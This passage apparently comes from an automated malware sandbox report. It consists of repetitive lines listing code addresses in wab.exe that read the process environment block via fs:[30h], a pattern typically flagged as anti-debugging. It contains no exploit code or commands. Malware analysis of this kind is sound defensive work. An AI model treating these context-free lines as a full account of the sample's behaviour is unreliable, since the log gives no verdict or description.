Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20209240 mov eax, dword ptr fs:[00000030h] 12_2_20209240
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20209240 mov eax, dword ptr fs:[00000030h] 12_2_20209240
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024724D mov eax, dword ptr fs:[00000030h] 12_2_2024724D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020A250 mov eax, dword ptr fs:[00000030h] 12_2_2020A250
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20216259 mov eax, dword ptr fs:[00000030h] 12_2_20216259
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CB256 mov eax, dword ptr fs:[00000030h] 12_2_202CB256
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CB256 mov eax, dword ptr fs:[00000030h] 12_2_202CB256
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202202A0 mov eax, dword ptr fs:[00000030h] 12_2_202202A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202202A0 mov eax, dword ptr fs:[00000030h] 12_2_202202A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202252A0 mov eax, dword ptr fs:[00000030h] 12_2_202252A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202252A0 mov eax, dword ptr fs:[00000030h] 12_2_202252A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202252A0 mov eax, dword ptr fs:[00000030h] 12_2_202252A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202252A0 mov eax, dword ptr fs:[00000030h] 12_2_202252A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A72A0 mov eax, dword ptr fs:[00000030h] 12_2_202A72A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A72A0 mov eax, dword ptr fs:[00000030h] 12_2_202A72A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h] 12_2_202A62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A62A0 mov ecx, dword ptr fs:[00000030h] 12_2_202A62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h] 12_2_202A62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h] 12_2_202A62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h] 12_2_202A62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h] 12_2_202A62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D92A6 mov eax, dword ptr fs:[00000030h] 12_2_202D92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D92A6 mov eax, dword ptr fs:[00000030h] 12_2_202D92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D92A6 mov eax, dword ptr fs:[00000030h] 12_2_202D92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D92A6 mov eax, dword ptr fs:[00000030h] 12_2_202D92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202992BC mov eax, dword ptr fs:[00000030h] 12_2_202992BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202992BC mov eax, dword ptr fs:[00000030h] 12_2_202992BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202992BC mov ecx, dword ptr fs:[00000030h] 12_2_202992BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202992BC mov ecx, dword ptr fs:[00000030h] 12_2_202992BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E284 mov eax, dword ptr fs:[00000030h] 12_2_2024E284
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E284 mov eax, dword ptr fs:[00000030h] 12_2_2024E284
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20290283 mov eax, dword ptr fs:[00000030h] 12_2_20290283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20290283 mov eax, dword ptr fs:[00000030h] 12_2_20290283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20290283 mov eax, dword ptr fs:[00000030h] 12_2_20290283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E5283 mov eax, dword ptr fs:[00000030h] 12_2_202E5283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024329E mov eax, dword ptr fs:[00000030h] 12_2_2024329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024329E mov eax, dword ptr fs:[00000030h] 12_2_2024329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202202E1 mov eax, dword ptr fs:[00000030h] 12_2_202202E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202202E1 mov eax, dword ptr fs:[00000030h] 12_2_202202E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202202E1 mov eax, dword ptr fs:[00000030h] 12_2_202202E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E52E2 mov eax, dword ptr fs:[00000030h] 12_2_202E52E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CF2F8 mov eax, dword ptr fs:[00000030h] 12_2_202CF2F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202092FF mov eax, dword ptr fs:[00000030h] 12_2_202092FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h] 12_2_2021A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h] 12_2_2021A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h] 12_2_2021A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h] 12_2_2021A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h] 12_2_2021A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h] 12_2_2023B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h] 12_2_2023B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h] 12_2_2023B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h] 12_2_2023B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h] 12_2_2023B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h] 12_2_2023B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h] 12_2_2023B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202192C5 mov eax, dword ptr fs:[00000030h] 12_2_202192C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202192C5 mov eax, dword ptr fs:[00000030h] 12_2_202192C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F2D0 mov eax, dword ptr fs:[00000030h] 12_2_2023F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F2D0 mov eax, dword ptr fs:[00000030h] 12_2_2023F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020B2D3 mov eax, dword ptr fs:[00000030h] 12_2_2020B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020B2D3 mov eax, dword ptr fs:[00000030h] 12_2_2020B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020B2D3 mov eax, dword ptr fs:[00000030h] 12_2_2020B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D132D mov eax, dword ptr fs:[00000030h] 12_2_202D132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D132D mov eax, dword ptr fs:[00000030h] 12_2_202D132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F32A mov eax, dword ptr fs:[00000030h] 12_2_2023F32A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20207330 mov eax, dword ptr fs:[00000030h] 12_2_20207330
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029930B mov eax, dword ptr fs:[00000030h] 12_2_2029930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029930B mov eax, dword ptr fs:[00000030h] 12_2_2029930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029930B mov eax, dword ptr fs:[00000030h] 12_2_2029930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024A30B mov eax, dword ptr fs:[00000030h] 12_2_2024A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024A30B mov eax, dword ptr fs:[00000030h] 12_2_2024A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024A30B mov eax, dword ptr fs:[00000030h] 12_2_2024A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020C310 mov ecx, dword ptr fs:[00000030h] 12_2_2020C310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20230310 mov ecx, dword ptr fs:[00000030h] 12_2_20230310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CF367 mov eax, dword ptr fs:[00000030h] 12_2_202CF367
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20217370 mov eax, dword ptr fs:[00000030h] 12_2_20217370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20217370 mov eax, dword ptr fs:[00000030h] 12_2_20217370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20217370 mov eax, dword ptr fs:[00000030h] 12_2_20217370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202B437C mov eax, dword ptr fs:[00000030h] 12_2_202B437C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020D34C mov eax, dword ptr fs:[00000030h] 12_2_2020D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020D34C mov eax, dword ptr fs:[00000030h] 12_2_2020D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E5341 mov eax, dword ptr fs:[00000030h] 12_2_202E5341
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20209353 mov eax, dword ptr fs:[00000030h] 12_2_20209353
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20209353 mov eax, dword ptr fs:[00000030h] 12_2_20209353
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029035C mov eax, dword ptr fs:[00000030h] 12_2_2029035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029035C mov eax, dword ptr fs:[00000030h] 12_2_2029035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029035C mov eax, dword ptr fs:[00000030h] 12_2_2029035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029035C mov ecx, dword ptr fs:[00000030h] 12_2_2029035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029035C mov eax, dword ptr fs:[00000030h] 12_2_2029035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029035C mov eax, dword ptr fs:[00000030h] 12_2_2029035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DA352 mov eax, dword ptr fs:[00000030h] 12_2_202DA352
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202433A0 mov eax, dword ptr fs:[00000030h] 12_2_202433A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202433A0 mov eax, dword ptr fs:[00000030h] 12_2_202433A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202333A5 mov eax, dword ptr fs:[00000030h] 12_2_202333A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020E388 mov eax, dword ptr fs:[00000030h] 12_2_2020E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020E388 mov eax, dword ptr fs:[00000030h] 12_2_2020E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020E388 mov eax, dword ptr fs:[00000030h] 12_2_2020E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023438F mov eax, dword ptr fs:[00000030h] 12_2_2023438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023438F mov eax, dword ptr fs:[00000030h] 12_2_2023438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E539D mov eax, dword ptr fs:[00000030h] 12_2_202E539D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20208397 mov eax, dword ptr fs:[00000030h] 12_2_20208397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20208397 mov eax, dword ptr fs:[00000030h] 12_2_20208397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20208397 mov eax, dword ptr fs:[00000030h] 12_2_20208397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2026739A mov eax, dword ptr fs:[00000030h] 12_2_2026739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2026739A mov eax, dword ptr fs:[00000030h] 12_2_2026739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CF3E6 mov eax, dword ptr fs:[00000030h] 12_2_202CF3E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h] 12_2_202203E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h] 12_2_202203E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h] 12_2_202203E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h] 12_2_202203E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h] 12_2_202203E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h] 12_2_202203E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h] 12_2_202203E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h] 12_2_202203E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E53FC mov eax, dword ptr fs:[00000030h] 12_2_202E53FC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022E3F0 mov eax, dword ptr fs:[00000030h] 12_2_2022E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022E3F0 mov eax, dword ptr fs:[00000030h] 12_2_2022E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022E3F0 mov eax, dword ptr fs:[00000030h] 12_2_2022E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202463FF mov eax, dword ptr fs:[00000030h] 12_2_202463FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CC3CD mov eax, dword ptr fs:[00000030h] 12_2_202CC3CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h] 12_2_2021A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h] 12_2_2021A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h] 12_2_2021A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h] 12_2_2021A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h] 12_2_2021A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h] 12_2_2021A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202183C0 mov eax, dword ptr fs:[00000030h] 12_2_202183C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202183C0 mov eax, dword ptr fs:[00000030h] 12_2_202183C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202183C0 mov eax, dword ptr fs:[00000030h] 12_2_202183C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202183C0 mov eax, dword ptr fs:[00000030h] 12_2_202183C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CB3D0 mov ecx, dword ptr fs:[00000030h] 12_2_202CB3D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020E420 mov eax, dword ptr fs:[00000030h] 12_2_2020E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020E420 mov eax, dword ptr fs:[00000030h] 12_2_2020E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020E420 mov eax, dword ptr fs:[00000030h] 12_2_2020E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020C427 mov eax, dword ptr fs:[00000030h] 12_2_2020C427
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024A430 mov eax, dword ptr fs:[00000030h] 12_2_2024A430
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20248402 mov eax, dword ptr fs:[00000030h] 12_2_20248402
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20248402 mov eax, dword ptr fs:[00000030h] 12_2_20248402
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20248402 mov eax, dword ptr fs:[00000030h] 12_2_20248402
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023340D mov eax, dword ptr fs:[00000030h] 12_2_2023340D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20211460 mov eax, dword ptr fs:[00000030h] 12_2_20211460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20211460 mov eax, dword ptr fs:[00000030h] 12_2_20211460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20211460 mov eax, dword ptr fs:[00000030h] 12_2_20211460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20211460 mov eax, dword ptr fs:[00000030h] 12_2_20211460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20211460 mov eax, dword ptr fs:[00000030h] 12_2_20211460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h] 12_2_2022F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h] 12_2_2022F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h] 12_2_2022F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h] 12_2_2022F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h] 12_2_2022F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h] 12_2_2022F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E547F mov eax, dword ptr fs:[00000030h] 12_2_202E547F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023A470 mov eax, dword ptr fs:[00000030h] 12_2_2023A470
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023A470 mov eax, dword ptr fs:[00000030h] 12_2_2023A470
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023A470 mov eax, dword ptr fs:[00000030h] 12_2_2023A470
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h] 12_2_2021B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h] 12_2_2021B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h] 12_2_2021B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h] 12_2_2021B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h] 12_2_2021B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h] 12_2_2021B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h] 12_2_2024E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h] 12_2_2024E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h] 12_2_2024E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h] 12_2_2024E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h] 12_2_2024E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h] 12_2_2024E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h] 12_2_2024E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h] 12_2_2024E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023245A mov eax, dword ptr fs:[00000030h] 12_2_2023245A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020645D mov eax, dword ptr fs:[00000030h] 12_2_2020645D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CF453 mov eax, dword ptr fs:[00000030h] 12_2_202CF453
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202164AB mov eax, dword ptr fs:[00000030h] 12_2_202164AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202434B0 mov eax, dword ptr fs:[00000030h] 12_2_202434B0
